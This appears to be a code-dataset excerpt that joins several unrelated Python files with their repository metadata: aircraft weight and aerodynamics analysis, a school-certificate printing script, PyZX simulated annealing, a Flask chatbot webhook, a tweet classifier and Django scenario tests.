    head = 1 if list1[0] < list2[0] else 0
    return head + compare(list1[1:], list2[1:])
#Problem 4 part 3
def double(s):
    """Return *s* with every character doubled, e.g. 'ab' -> 'aabb'.

    Bug fix: the original computed the recursive result `b` but then
    returned only `s[-1] + s[-1]`, discarding `b` — so only the last
    character was ever doubled, contradicting the documented behaviour.
    """
    if s == '':
        return ''
    else:
        b = double(s[0:-1])
        # Prepend the doubled prefix before the doubled last character.
        return b + s[-1] + s[-1]
"carlosarielos2@gmail.com"
] | carlosarielos2@gmail.com |
68bf009de745f3d83520e2323ac43fc8e2a5e812 | f9bf38f58e56f4cc6f9170bf05b874c1247f7c29 | /Source/analyze.py | 1e9f8bf666962482601db6271dcd4f8b07249cce | [] | no_license | e2Xg/ThesisSource | ad2fd6c3494e13bbe57fc311865169353e86b548 | f8a0d0a1fa4104b2e74890583c6773cc06ec9a44 | refs/heads/master | 2022-05-16T03:04:53.801277 | 2019-09-17T03:45:06 | 2019-09-17T03:45:06 | 186,252,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,573 | py | # -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
from Source.analyze_geometry import analyze_geometry
from Source.Engine.engine_performance import engine_performance
from Source.analyze_weight import analyze_weight
from Source.analyze_aerodynamics import analyze_aerodynamics
from Source.analyze_point_performance import analyze_point_performance
def analyze(design_input,geometry_input,engine_input,point_performance_input=None,onlyobjectives=False):
    """
    Description:
        Finds geometrical, mass, aerodynamic (and optionally point
        performance) properties of the aircraft using all inputs.
    Variables:
        >>> design_input : All design inputs data block (pandas DataFrame,
            indexed by parameter name with a "Value" column).
        >>> geometry_input : All geometry input data block.
        >>> engine_input : Engine data block (mapping with a "Weight" key).
        >>> point_performance_input : Optional pandas DataFrame; point
            performance is only analyzed when this is a DataFrame.
        >>> onlyobjectives : Forwarded to analyze_point_performance.
    Returns:
        (geometry_data, weight_data, aerodynamic_data, point_performance_data)
        where point_performance_data is None if no input was given.
    """
    #Analyze geometrical, mass, aerodynamic properties
    # Analyze Geometry
    geometry_data = analyze_geometry(geometry_input)
    # Analyze Weight
    # Initialise every weight-model input to a neutral default
    # (note PCTL deliberately defaults to 1.0, not 0.0).
    XL = 0.0; TR = 0.0; SPAN = 0.0; SW = 0.0; AR = 0.0
    LE_SWEEP = 0.0; QC_SWEEP = 0.0; TCA = 0.0; ULF = 0.0
    PCTL = 1.0; SFLAP = 0.0; NEW = 0; FNEF = 0; SHT = 0.0
    NVERT = 0; TRVT = 0.0; SVT = 0.0; ARVT = 0.0; SWPVT = 0.0
    SCAN = 0.0; TRCAN = 0.0; WLDPAYLOAD = 0.0; NFIN = 0
    SFIN = 0.0; TRFIN = 0.0; THRUST = 0.0; WF = 0.0
    DF = 0.0; VMAX = 0.0; WPAINT = 0.0; SWTWG = 0.0
    SWTHT = 0.0; SWTVT = 0.0; SWTFU = 0.0; SWTCN = 0.0
    WENG = 0.0; NENG = 0; FPAREA = 0.0; WARM = 0.0
    WMARG = 0.0; WPAYLOAD = 0.0; TOTVOLFUSF = 0.0
    FUELDENSITY = 0.0; NTANK = 0
    # Set values based on design data
    # (row labels must match the design_input index exactly — note the
    # "Armanent Weight" spelling is how the key appears in the data.)
    VMAX = design_input.loc["Maximum Mach Number","Value"]
    ULF = design_input.loc["Ultimate Load Factor","Value"]
    NEW = design_input.loc["Number of Engines at Wing","Value"]
    FNEF = design_input.loc["Number of Engines at Fuselage","Value"]
    NENG = design_input.loc["Total Number of Engines","Value"]
    WARM = design_input.loc["Armanent Weight","Value"]
    WPAYLOAD = design_input.loc["Design Payload Weight","Value"]
    WLDPAYLOAD = design_input.loc["Maximum Payload Weight","Value"]
    WPAINT = design_input.loc["Paint Weight per Square Meters","Value"]
    WMARG = design_input.loc["Empty Weight Margin %","Value"]
    FUELDENSITY = design_input.loc["Fuel Density","Value"]
    NTANK = design_input.loc["Total Number of Fuel Tanks","Value"]
    #Set values based on engine data
    WENG = engine_input["Weight"]
    # Static sea-level thrust at full setting (setting=3), converted from
    # Newtons to kgf below.
    dummy, THRUST_N = engine_performance(
        engine_input = engine_input,
        number_of_engines = NENG,
        altitude = 0.0,
        mach = 0.0,
        setting = 3
        )
    THRUST = THRUST_N/9.81
    # Set values based on geometry data: walk every component and pull the
    # parameters the weight model needs, keyed on the component "Type".
    for tag in geometry_data.keys():
        #Component is fuselage
        if geometry_data[tag]["Type"] == "Fuselage":
            XL = geometry_data[tag]["Data"].loc["Length","Value"]
            WF = geometry_data[tag]["Data"].loc["Max Width","Value"]
            DF = geometry_data[tag]["Data"].loc["Max Depth","Value"]
            SWTFU = geometry_data[tag]["Data"].loc["Wetted Surface Area","Value"]
            FPAREA = WF*XL
            # Usable fuselage fuel volume: theoretical volume minus systems
            # volume minus a 35% structural allowance, scaled by the fuel
            # volume ratio (given in percent).
            TOTVOLFUSF = (geometry_data[tag]["Data"].loc["Theoretical Volume","Value"] - design_input.loc["Main Systems Volume","Value"] - 0.35*geometry_data[tag]["Data"].loc["Theoretical Volume","Value"])*(design_input.loc["Fuselage Fuel Volume Ratio","Value"]/100.0)
        elif geometry_data[tag]["Type"] == "Wing":
            TR = geometry_data[tag]["Data"].loc["Planform Taper Ratio","Value"]
            SPAN = geometry_data[tag]["Data"].loc["Planform Span","Value"]
            SW = geometry_data[tag]["Data"].loc["Planform Area","Value"]
            ETR = geometry_data[tag]["Data"].loc["Exposed Planform Taper Ratio","Value"]
            ESPAN = geometry_data[tag]["Data"].loc["Exposed Planform Span","Value"]
            ESW = geometry_data[tag]["Data"].loc["Exposed Planform Area","Value"]
            AR = (SPAN**2)/SW
            TCA = geometry_data[tag]["Data"].loc["Weighted Average of Exposed Thickness to Chord Ratio","Value"]
            LE_SWEEP = geometry_data[tag]["Data"].loc["Planform Leading-Edge Sweep Angle","Value"]
            # Quarter-chord sweep from leading-edge sweep, AR and taper
            # (angles handled in radians via numpy).
            QC_SWEEP = np.arctan(np.tan(LE_SWEEP) - (4.0/AR)*((0.25)*((1.0-TR)/(1.0+TR))))
            SWTWG = geometry_data[tag]["Data"].loc["Wetted Surface Area","Value"]
            SFLAP += geometry_data[tag]["Data"].loc["Exposed Planform Area","Value"]*design_input.loc["Flap Area Factor","Value"]
        elif geometry_data[tag]["Type"] == "Canard":
            SCAN = geometry_data[tag]["Data"].loc["Exposed Planform Area","Value"]
            TRCAN = geometry_data[tag]["Data"].loc["Exposed Planform Taper Ratio","Value"]
            SWTCN = geometry_data[tag]["Data"].loc["Wetted Surface Area","Value"]
            SFLAP += SCAN*design_input.loc["Flap Area Factor","Value"]
        elif geometry_data[tag]["Type"] == "Horizontal Tail":
            SHT = geometry_data[tag]["Data"].loc["Exposed Planform Area","Value"]
            SWTHT = geometry_data[tag]["Data"].loc["Wetted Surface Area","Value"]
            SFLAP += SHT*design_input.loc["Flap Area Factor","Value"]
        elif geometry_data[tag]["Type"] == "Vertical Tail":
            NVERT += 1
            TRVT = geometry_data[tag]["Data"].loc["Exposed Planform Taper Ratio","Value"]
            SVT = geometry_data[tag]["Data"].loc["Exposed Planform Area","Value"]
            ARVT = geometry_data[tag]["Data"].loc["Exposed Planform Aspect Ratio","Value"]
            LE_SWEEPVT = geometry_data[tag]["Data"].loc["Exposed Planform Leading-Edge Sweep Angle","Value"]
            SWPVT = np.arctan(np.tan(LE_SWEEPVT) - (4.0/ARVT)*((0.25)*((1.0-TRVT)/(1.0+TRVT))))
            SWTVT = geometry_data[tag]["Data"].loc["Wetted Surface Area","Value"]
            SFLAP += SVT*design_input.loc["Flap Area Factor","Value"]
    # Positional argument order must match analyze_weight's signature.
    weight_data = analyze_weight(
        TR,
        SPAN,
        SW,
        TCA,
        QC_SWEEP,
        ULF,
        PCTL,
        SFLAP,
        NEW,
        XL,
        FNEF,
        SHT,
        NVERT,
        TRVT,
        SVT,
        ARVT,
        SWPVT,
        SCAN,
        TRCAN,
        WLDPAYLOAD,
        NFIN,
        SFIN,
        TRFIN,
        THRUST,
        WF,
        DF,
        VMAX,
        WPAINT,
        SWTWG,
        SWTHT,
        SWTVT,
        SWTFU,
        SWTCN,
        WENG,
        NENG,
        FPAREA,
        WARM,
        WMARG,
        WPAYLOAD,
        TOTVOLFUSF,
        FUELDENSITY,
        NTANK )
    #Analyze Aerodynamics
    aerodynamic_data = analyze_aerodynamics(
        max_mach = design_input.loc["Maximum Mach Number","Value"],
        max_altitude = design_input.loc["Maximum Altitude","Value"],
        geometry_data = geometry_data,
        cldesign = design_input.loc["Design Lift Coefficient","Value"],
        base_area = design_input.loc["Base Area","Value"],
        EWD = design_input.loc["Wave-Drag Efficiency Factor","Value"],
        )
    #Analyze Point Performance (only when an input DataFrame was supplied)
    point_performance_data = None
    if isinstance(point_performance_input, pd.DataFrame):
        point_performance_data = analyze_point_performance(
            point_performance_input,
            design_input,
            engine_input,
            geometry_data,
            weight_data,
            aerodynamic_data,
            onlyobjectives=onlyobjectives)
    return geometry_data, weight_data, aerodynamic_data, point_performance_data
| [
"50546864+e2Xg@users.noreply.github.com"
] | 50546864+e2Xg@users.noreply.github.com |
b80a77d8f486d5a17060304316da99d0e4bbddfe | 7d3e83bf2a100c347c11cb9d8193abb5f4c00360 | /build/exe.win32-3.6/mkmany.py | 62563a1bdec32a5dcc33669ce5ab066ff136a8d0 | [] | no_license | shinde-shantanu/LC_Maker | ad25cdc830711d48dd72a2a60a1c05e3bd1eb3d0 | 4105f853feeaa5b3951cfd521392277b430739ad | refs/heads/master | 2020-08-08T00:16:09.207357 | 2019-10-20T13:47:17 | 2019-10-20T13:47:17 | 213,636,674 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,495 | py | import pandas
#from lc1 import give_print
from pandas import *
df=read_csv('dbaa.csv')
from docx.enum.text import WD_ALIGN_PARAGRAPH
import docx
from docx import *
import tempfile
import win32api
import win32print
def print_all():
    """Generate a leaving-certificate page for every student row in the
    module-level DataFrame `df`, merge all pages into one document, save it
    as op.docx and send it to the default Windows printer.

    NOTE(review): the save/ShellExecute calls are placed after the loop
    (merge everything, then print once) — confirm against the original
    source's indentation.
    """
    #merged_document = Document()
    # The blank certificate template; re-opened per student below.
    filename = 'lc - Copy.docx'
    d1=docx.Document(filename)
    d1.add_page_break()
    for x in range(0,len(df['जनरल रजिस्टर क्र.'])):
        print(df['आडनाव'][x])
        #print(e.get())
        # Collect this student's fields as strings (keys match the CSV
        # columns exactly, including trailing spaces in some names).
        dat={}
        dat['अ. क्र. ']=str(int(df['अ. क्र. '][x]))
        dat['जनरल रजिस्टर क्र.']=str(df['जनरल रजिस्टर क्र.'][x])
        dat['स्टुडंट आय डी']=str(df['स्टुडंट आय डी'][x])
        dat['यु आय डी नं.']=str(int(df['यु आय डी नं.'][x]))
        print(str(int(df['यु आय डी नं.'][x])))
        dat['आडनाव']=str(df['आडनाव'][x])
        dat['नाव ']=str(df['नाव '][x])
        dat['वडिलांचे नाव ']=str(df['वडिलांचे नाव '][x])
        dat['आईचे नाव']=str(df['आईचे नाव'][x])
        dat['राष्ट्रीयत्व']=str(df['राष्ट्रीयत्व'][x])
        dat['मातृभाषा']=str(df['मातृभाषा'][x])
        dat['धर्म']=str(df['धर्म'][x])
        dat['जात']=str(df['जात'][x])
        dat['पोटजात']=str(df['पोटजात'][x])
        dat['जन्मस्थळ']=str(df['जन्मस्थळ'][x])
        dat['तालुका']=str(df['तालुका'][x])
        dat['जिल्हा']=str(df['जिल्हा'][x])
        dat['राज्य']=str(df['राज्य'][x])
        dat['देश']=str(df['देश'][x])
        dat['इ.सनाप्रमाणे जन्मदिनांक']=str(df['इ.सनाप्रमाणे जन्मदिनांक'][x])
        dat['जन्मदिनांक अक्षरी']=str(df['जन्मदिनांक अक्षरी'][x])
        dat['या पूर्वीची शाळा व इयत्ता ']=str(df['या पूर्वीची शाळा व इयत्ता '][x])
        dat['या शाळेत प्रवेश घेतल्याचा दिनांक ']=str(df['या शाळेत प्रवेश घेतल्याचा दिनांक '][x])
        dat['इयत्ता ']=str(df['इयत्ता '][x])
        dat['अभ्यासातली प्रगती']=str(df['अभ्यासातली प्रगती'][x])
        dat['वर्तणूक ']=str(df['वर्तणूक '][x])
        dat['शाळा सोडल्याचा दिनांक']=str(df['शाळा सोडल्याचा दिनांक'][x])
        dat['कोणत्या इयत्तेत शिकत होता व केव्हापासून']=str(df['कोणत्या इयत्तेत शिकत होता व केव्हापासून'][x])
        dat['शाळा सोडण्याचे कारण ']=str(df['शाळा सोडण्याचे कारण '][x])
        dat['शेरा']=str(df['शेरा'][x])
        #print(dat)
        #f=open(filename,'x')
        # Open a fresh copy of the template and fill its paragraphs/tables
        # by fixed index positions.
        filename = 'lc - Copy.docx'
        d=docx.Document(filename)
        l=d.paragraphs
        t=d.tables
        gr=l[0]
        gr.text="\nअनु. क्र " + dat['अ. क्र. ']
        gr.add_run(str("जनरल रजि. क्र. " + dat['जनरल रजिस्टर क्र.']).rjust(126)) ##Gr. no. and count
        s_id=l[3]
        s_id.text = s_id.text +" "+ dat['स्टुडंट आय डी'] ##Student id
        uid=l[4]
        uid.text = uid.text + " " + dat['यु आय डी नं.'] ##uid no.
        t[0].rows[0].cells[0].text=dat['नाव ']
        t[0].rows[0].cells[1].text=dat['वडिलांचे नाव ']
        t[0].rows[0].cells[2].text=dat['आडनाव']
        m_name=l[7]
        # NOTE(review): debug print left in place ("abcd" marker).
        print(m_name.text+"abcd")
        m_name.text = "आईचे नाव :" + " " + dat['आईचे नाव'] ##mothers name
        nationality=l[8]
        nationality.text="राष्ट्रीयत्व : "+dat['राष्ट्रीयत्व']+"\t"
        nationality.add_run("मातृभाषा : " + dat['मातृभाषा']) ##nationality and mothertounge
        rel=l[9]
        rel.text="धर्म : "+dat['धर्म']+"\t"
        rel.add_run("जात : "+dat['जात']+"\t")
        rel.add_run("पोटजात : "+dat['पोटजात']+"\t") ##religion caste sub caste
        birthplace=l[10]
        birthplace.text="जन्मस्थळ (गांव/शहर) : "+dat['जन्मस्थळ']+"\t"
        birthplace.add_run("तालुका : "+dat['तालुका']+"\t")
        birthplace.add_run("जिल्हा : "+dat['जिल्हा']) ##birthplace village sub district district
        state=l[11]
        state.text="राज्य : "+dat['राज्य']+"\t"
        state.add_run("देश : "+dat['देश']) ##state country
        bday=l[12]
        bday.text = bday.text + " " + dat['इ.सनाप्रमाणे जन्मदिनांक'] ##Birthdate
        bdayw=l[13]
        bdayw.text = bdayw.text + " " + dat['जन्मदिनांक अक्षरी'] ##Birthdate in words
        prev_sch=l[14]
        prev_sch.text = prev_sch.text + " " + dat['या पूर्वीची शाळा व इयत्ता '] ##Previous school and standard
        do_join=l[15]
        do_join.text="या शाळेत प्रवेश घेतल्याचा दिनांक : "+dat['या शाळेत प्रवेश घेतल्याचा दिनांक ']+"\t"
        do_join.add_run("इयत्ता : "+dat['इयत्ता ']) ##Date of join and standard
        prog=l[16]
        prog.text="अभ्यासातील प्रगती : "+dat['अभ्यासातली प्रगती']+"\t"
        prog.add_run("वर्तणूक : "+dat['वर्तणूक ']) ##Progress and remark
        do_leave=l[17]
        do_leave.text = do_leave.text + " " + dat['शाळा सोडल्याचा दिनांक'] ##date of leaving
        standard=l[18]
        standard.text = standard.text + " " + dat['कोणत्या इयत्तेत शिकत होता व केव्हापासून'] ##standard and since when
        reason=l[19]
        reason.text = reason.text + " " + dat['शाळा सोडण्याचे कारण '] ##reason for leaving
        remark=l[20]
        remark.text = remark.text + " " + dat['शेरा'] ##remark
        # Append this student's filled page into the merged document.
        for element in d.element.body:
            d1.element.body.append(element)
    d1.save("op.docx")
    # Hand the merged document to the Windows shell "print" verb.
    win32api.ShellExecute (
        0,
        "print",
        "op.docx",
        #
        # If this is None, the default printer will
        # be used anyway.
        #
        '/d:"%s"' % win32print.GetDefaultPrinter (),
        ".",
        0
    )
| [
"shantanushinde.shinde@gmail.com"
] | shantanushinde.shinde@gmail.com |
77628a507acbcfef9cf2afa34963e24495defd86 | 19662499684e7244185f81d69fd37713931d0e78 | /pyzx/local_search/simulated_annealing.py | cee62b3cb13e28cc672cae381755437686d8ab3b | [
"Apache-2.0"
] | permissive | rkruegs123/pyzx | 6e32578b280365f4bd4ec7a475dc1caead943725 | e1254d8cc98c2af6662411af14436aa5b4f2b658 | refs/heads/master | 2023-04-12T09:37:44.654974 | 2021-04-27T15:39:28 | 2021-04-27T15:39:28 | 361,756,628 | 0 | 0 | Apache-2.0 | 2021-04-26T13:16:47 | 2021-04-26T13:16:47 | null | UTF-8 | Python | false | false | 2,846 | py | # PyZX - Python library for quantum circuit rewriting
# and optimisation using the ZX-calculus
# Copyright (C) 2021 - Aleks Kissinger and John van de Wetering
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tqdm import tqdm # type: ignore
import random
import math
import numpy as np
from .congruences import uniform_weights, apply_rand_lc, apply_rand_pivot
from .scores import g_wgc
import sys
if __name__ == '__main__':
sys.path.append('..')
from pyzx.simplify import full_reduce
"""
This module contains an implementation of simulated annealing over ZX-diagrams. Equivalent ZX-diagrams are generated using the congruences defined in congruences.py. The default energy function is defined in scores.py. The default goal of this approach is to reduce the 2-qubit count of a fully-simplified ZX-diagram (i.e., of that circuit obtained via extraction).
"""
__all__ = ['anneal']
# simulated annealing
def anneal(g, iters=1000,
           temp=25,
           cool=0.005,
           score=g_wgc,
           cong_ps=[0.5, 0.5],
           lc_select=uniform_weights,
           pivot_select=uniform_weights,
           full_reduce_prob=0.1,
           reset_prob=0.0,
           quiet=False
           ):
    """Simulated annealing over a ZX-diagram generated by the congruences
    defined in congruences.py to minimize the supplied energy function.

    Returns (g_best, best_scores): the best diagram found and the running
    best score recorded once per iteration.
    """
    g_best = g.copy()
    sz = score(g_best)
    sz_best = sz
    best_scores = list()
    for i in tqdm(range(iters), desc="annealing...", disable=quiet):
        # Propose a neighbour by applying one random congruence
        # (local complementation or pivot, chosen with probabilities cong_ps).
        g1 = g.copy()
        cong_method = np.random.choice(["LC", "PIVOT"], 1, p=cong_ps)[0]
        if cong_method == "PIVOT":
            apply_rand_pivot(g1, weight_func=pivot_select)
        else:
            apply_rand_lc(g1, weight_func=lc_select)
        # probabilistically full_reduce:
        if random.uniform(0, 1) < full_reduce_prob:
            full_reduce(g1)
        sz1 = score(g1)
        best_scores.append(sz_best)
        # Geometric cooling schedule (temp == 0 means greedy descent).
        if temp != 0: temp *= 1.0 - cool
        # Metropolis acceptance: always take improvements, otherwise accept
        # with probability exp((sz - sz1)/temp).
        if sz1 < sz or \
           (temp != 0 and random.random() < math.exp((sz - sz1)/temp)):
            sz = sz1
            g = g1.copy()
            if sz < sz_best:
                g_best = g.copy()
                sz_best = sz
        elif random.uniform(0, 1) < reset_prob:
            # Occasionally restart the walk from the best diagram seen.
            g = g_best.copy()
    return g_best, best_scores
| [
"rkruegs123@gmail.com"
] | rkruegs123@gmail.com |
6d0343e54fbaea11fb067aa7b20d85419dff3c7a | 11063daf6a13da6c5ddc94ae542b2e466a1f869c | /test-demo/io-go-demo.py | 39f73e59cb8477fdafc7a89c42e7b992620cdec4 | [] | no_license | effielikesmilk/test-demo | 1caf9517479b51681d19d00cfeec07d8ff499a89 | 3ca9294555b3cfd9220b64755ac3e01eb39f9e7d | refs/heads/master | 2021-07-16T10:55:32.596585 | 2017-10-23T11:34:08 | 2017-10-23T11:34:08 | 107,973,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | # -*- coding:utf8 -*-
from __future__ import print_function # 禁用print,只能用print()
import os
import json
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
    """API.AI/Dialogflow webhook endpoint: parse the incoming JSON request,
    build a reply via processRequest(), and return it with a JSON
    Content-Type header."""
    req = request.get_json(silent=True, force=True)
    print("Request:")
    print(json.dumps(req, indent=4))
    res = processRequest(req)
    # print(res)
    # NOTE(review): res is a plain string, yet the Content-Type claims JSON —
    # confirm the consumer accepts that.
    r = make_response(res) # make_response() requires a string argument
    r.headers['Content-Type'] = 'application/json'
    return r
def processRequest(req):
    """Choose the webhook reply text based on the request's action field."""
    result = req.get("result")
    action = result.get("action")
    previous_action = result.get("parameters").get("my-action")
    if action == "goSomewhere.no-recom-place":
        # Follow-up intent: fall back to the previously stored action.
        action = previous_action
        reply = "那去铜锣湾你觉得ok吗?"
    else:
        reply = "那你想去尖沙咀么?"
    return reply
return res
if __name__ == '__main__':
    # Port is configurable via the PORT environment variable (default 5000).
    port = int(os.getenv('PORT', 5000))
    print("Starting app on port %d" % port)
    app.run(port=port)
| [
"noreply@github.com"
] | effielikesmilk.noreply@github.com |
f4346c34f19288408128c36398eb661b7ac8aef3 | bf3157570dfb3e91001d8a30b7d89a06b6e5b5ff | /InitialConfiguration.py | 78a5a26ca586270e3a8323dfb4d187975bf248b9 | [] | no_license | shenoyvvarun/twit-miner | 0c9dcbee52ae5508a6a118b5bb82fed1181ec39b | fcf1331fe636678868a84270cc64cd06bc474dc0 | refs/heads/master | 2021-01-16T19:59:16.837543 | 2013-03-18T17:05:24 | 2013-03-18T17:05:24 | 9,126,082 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,331 | py | from TweetsClassifier import Classifier
from TweetsValidator import Validator
from TweetsProcessor import TweetProcessor
import json
#This code should be executed during the inital configuration / starting up
def main():
    """Initial one-time setup (Python 2): builds the training data, then runs
    three clean-up/classify/validate passes over the training, validation and
    test sets, reporting progress after each pass."""
    #has to be executed only once
    # NOTE(review): addTrainingToTweets is not defined or imported in the
    # visible portion of this file — confirm where it comes from.
    addTrainingToTweets()
    # Category weight parameters passed through to validation/clean-up.
    a =7.5
    b =5.8
    c =1.3
    print "Please Be patient while we make things ready will take around 5 mins\nGrab a coffee till then"
    classify = Classifier()
    classify.categorisetweets()
    for i in range(3):
        # Pass 1: re-clean both categories, re-train, validate on training set.
        cleanUpTrainingSet(a,b,c,"sports")
        cleanUpTrainingSet(a,b,c,"politics")
        classify = Classifier()
        classify.categorisetweets()
        validate = Validator()
        validate.validateToFile(r'training.txt','Outputtraining.txt',a,b,c)
        # Pass 2: same cycle against the validation set.
        cleanUpTrainingSet(a,b,c,"sports")
        cleanUpTrainingSet(a,b,c,"politics")
        classify = Classifier()
        classify.categorisetweets()
        validate = Validator()
        validate.validateToFile(r'validation.txt','Outputvalidation.txt',a,b,c)
        # Pass 3: same cycle against the test set.
        cleanUpTrainingSet(a,b,c,"sports")
        cleanUpTrainingSet(a,b,c,"politics")
        classify = Classifier()
        classify.categorisetweets()
        validate = Validator()
        validate.validateToFile(r'test.txt','OutputTest.txt',a,b,c)
        print str((i+1)*100/3) +"% complete"
    print "Awesome you are done.\nNow you can run RunTwitMiner.py as many time you want :) \nNote the input file for the program should be in test.txt and you will get the output in OutputTest.txt"
def cleanUpTrainingSet(a, b, c, cat):
    """Drop misclassified tweets from the '<cat>trainingset' JSON file.

    Re-scores every stored tweet against the current sports/politics
    weight tables (words, hashtags, @-mentions) and removes tweets whose
    combined score favours the other category, then rewrites the file.

    a   -- weight factor applied to hashtag tokens
    b   -- weight factor applied to @-mention tokens
    c   -- weight factor applied to plain-word tokens
    cat -- category being cleaned: "sports" or "politics"
    """
    tweetprocessor = TweetProcessor()

    def _load(name):
        # Load a JSON table via a context manager so the descriptor is
        # closed (the original leaked one open handle per table).
        with open(name) as fh:
            return json.load(fh)

    sportswords = _load("sportswords")
    politicswords = _load("politicswords")
    sportshashtags = _load("sportshashtags")
    politicshashtags = _load("politicshashtags")
    sportsmentions = _load("sportsmentions")
    politicsmentions = _load("politicsmentions")
    tweets = _load(cat + "trainingset")

    # BUG FIX: the original called tweets.remove(actualtweet) while
    # iterating over `tweets`, which skips the element following every
    # removal; build the surviving list instead.
    kept = []
    for actualtweet in tweets:
        tweet = tweetprocessor.processTweet(actualtweet)
        totalsportsweight = 0.0
        totalpoliticsweight = 0.0
        for word in tweetprocessor.getwords(tweet):
            if word == '':
                continue
            # Select the weight tables and scale factor by token type.
            if word[0] == '#' and len(word.split()) < 2:
                scale, sporttable, politicstable = a, sportshashtags, politicshashtags
            elif word[0] == '@' and len(word.split()) < 2:
                scale, sporttable, politicstable = b, sportsmentions, politicsmentions
            else:
                scale, sporttable, politicstable = c, sportswords, politicswords
            # +1.0 smoothing keeps both weights >= 1.0, so no zero guard
            # is needed.  (BUG FIX: the original guard tested
            # `sportwordweight != 0` twice -- a typo for the politics
            # weight -- and was vacuously true after smoothing anyway.)
            sportweight = sporttable.get(word, 0.0) + 1.0
            politicweight = politicstable.get(word, 0.0) + 1.0
            totalsportsweight += scale * sportweight / (sportweight + politicweight)
            totalpoliticsweight += scale * politicweight / (sportweight + politicweight)
        if cat == "politics" and totalsportsweight > totalpoliticsweight:
            continue  # scored as sports -> drop from the politics set
        if cat == "sports" and totalsportsweight < totalpoliticsweight:
            continue  # scored as politics -> drop from the sports set
        kept.append(actualtweet)

    # Text mode ('w') instead of 'wb': json.dump writes str, which also
    # keeps this working under Python 3.
    with open(cat + "trainingset", 'w') as out:
        json.dump(kept, out, indent=True)
def addTrainingToTweets():
    """Split the labelled training file into per-category tweet lists.

    Reads training.txt (lines of the form "<id> <Sports|Politics> <tweet>"),
    cleans each tweet with TweetProcessor and writes the results to the
    JSON files "sportstrainingset" and "politicstrainingset".

    Fixes: the input file and both output files are now closed (the
    original leaked all three handles), and the lines are classified in a
    single pass instead of two.
    """
    with open(r'training.txt', 'r') as fh:
        trainingset = fh.read().splitlines()
    tweetprocessor = TweetProcessor()
    sportstweets = []
    politicstweets = []
    for line in trainingset:
        label = line.split()[1]
        # The offsets skip past "<id> Sports " / "<id> Politics ".
        # NOTE(review): the trailing [:-1] drops the line's last character;
        # splitlines() already removed the newline, so this trims one
        # content character -- preserved as-is, confirm against the data
        # format before changing.
        if label == 'Sports':
            start = line.find(" ") + 9
            sportstweets.append(tweetprocessor.processTweet(line[start:-1]))
        elif label == 'Politics':
            start = line.find(" ") + 11
            politicstweets.append(tweetprocessor.processTweet(line[start:-1]))
    with open("sportstrainingset", 'w') as out:
        json.dump(sportstweets, out, indent=True)
    with open("politicstrainingset", 'w') as out:
        json.dump(politicstweets, out, indent=True)
if __name__ == "__main__":
    main()  # run the one-off bootstrap when executed as a script
| [
"ahmed.bolwar@gmail.com"
] | ahmed.bolwar@gmail.com |
fc9b5929a490b9c6b323bc58c23b48778a7c5d42 | 153d52766a377fa12c3dab41f1ef4059d875d31d | /openebs/tests/test_model_scenario.py | 5676f8ab69ba1099e60aef2edd7fce7f2cb73931 | [] | no_license | StichtingOpenGeo/openebs2 | 8b09ec2d8b8a4f6eed5d8169f11506cdfbedde45 | f30110b08151de213d536f7223a6b46ac27f3d78 | refs/heads/master | 2023-05-23T22:07:06.397095 | 2023-05-11T10:30:26 | 2023-05-11T10:30:26 | 11,089,319 | 2 | 1 | null | 2023-05-11T10:30:27 | 2013-07-01T08:45:34 | Python | UTF-8 | Python | false | false | 8,146 | py | from datetime import timedelta
from django.contrib.auth.models import User
from django.contrib.gis.geos import Point
from django.test import TestCase
from django.utils.timezone import now
from kv1.models import Kv1Stop
from kv15.enum import *
from openebs.models import Kv15Scenario, Kv15ScenarioMessage, Kv15ScenarioStop, Kv15Stopmessage, Kv15ScenarioInstance
class Kv15ScenarioModel(TestCase):
    """Tests for planning, instantiating and deleting KV15 scenarios.

    Exercises Kv15Scenario.plan_messages() (which materialises scenario
    messages into Kv15Stopmessage rows linked via Kv15ScenarioInstance)
    and the delete paths: Kv15Scenario.delete_all(), message
    force_delete(), and deleting the scenario object itself.
    """
    # NOTE(review): class-level mutable list -- setUp() appends to it on
    # every test run, so it grows across tests.  The tests only index
    # haltes[0]..haltes[4] and the stops are saved with fixed pks, so
    # this happens to work, but an instance attribute would be cleaner.
    haltes = []
    user = None
    def setUp(self):
        """Create five Kv1Stop fixtures and a reusable test user."""
        # Stops ("haltes")
        h1 = Kv1Stop(pk=10, userstopcode='111', name="Om de hoek", location=Point(1, 1))
        h2 = Kv1Stop(pk=11, userstopcode='112', name="Hier", location=Point(1, 1))
        h3 = Kv1Stop(pk=12, userstopcode='113', name="Daar", location=Point(2, 2))
        h4 = Kv1Stop(pk=14, userstopcode='114', name="Overal", location=Point(3, 3))
        h5 = Kv1Stop(pk=15, userstopcode='115', name="Nergens", location=Point(4, 4))
        h1.save()
        h2.save()
        h3.save()
        h4.save()
        h5.save()
        self.haltes.append(h1)
        self.haltes.append(h2)
        self.haltes.append(h3)
        self.haltes.append(h4)
        self.haltes.append(h5)
        # Test user: create once, reuse on subsequent runs.
        self.user = User.objects.filter(username="test_scenario")
        if self.user.count() < 1:
            self.user = User.objects.create_user("test_scenario")
        else:
            self.user = self.user[0]
    def test_plan_scenario_multiple(self):
        """plan_messages() turns three scenario messages (with 2/1/2 stops)
        into three stop messages with sequential message code numbers."""
        self.assertEqual(0, Kv15Stopmessage.objects.filter(dataownercode='HTM').count())
        a = Kv15Scenario(name="Just a test")
        a.save()
        m1 = Kv15ScenarioMessage(scenario=a, dataownercode='HTM', messagecontent='Blah!')
        m1.save()
        Kv15ScenarioStop(message=m1, stop=self.haltes[0]).save()
        Kv15ScenarioStop(message=m1, stop=self.haltes[1]).save()
        m2 = Kv15ScenarioMessage(scenario=a, dataownercode='HTM', messagecontent='We rijden niet!')
        m2.save()
        Kv15ScenarioStop(message=m2, stop=self.haltes[2]).save()
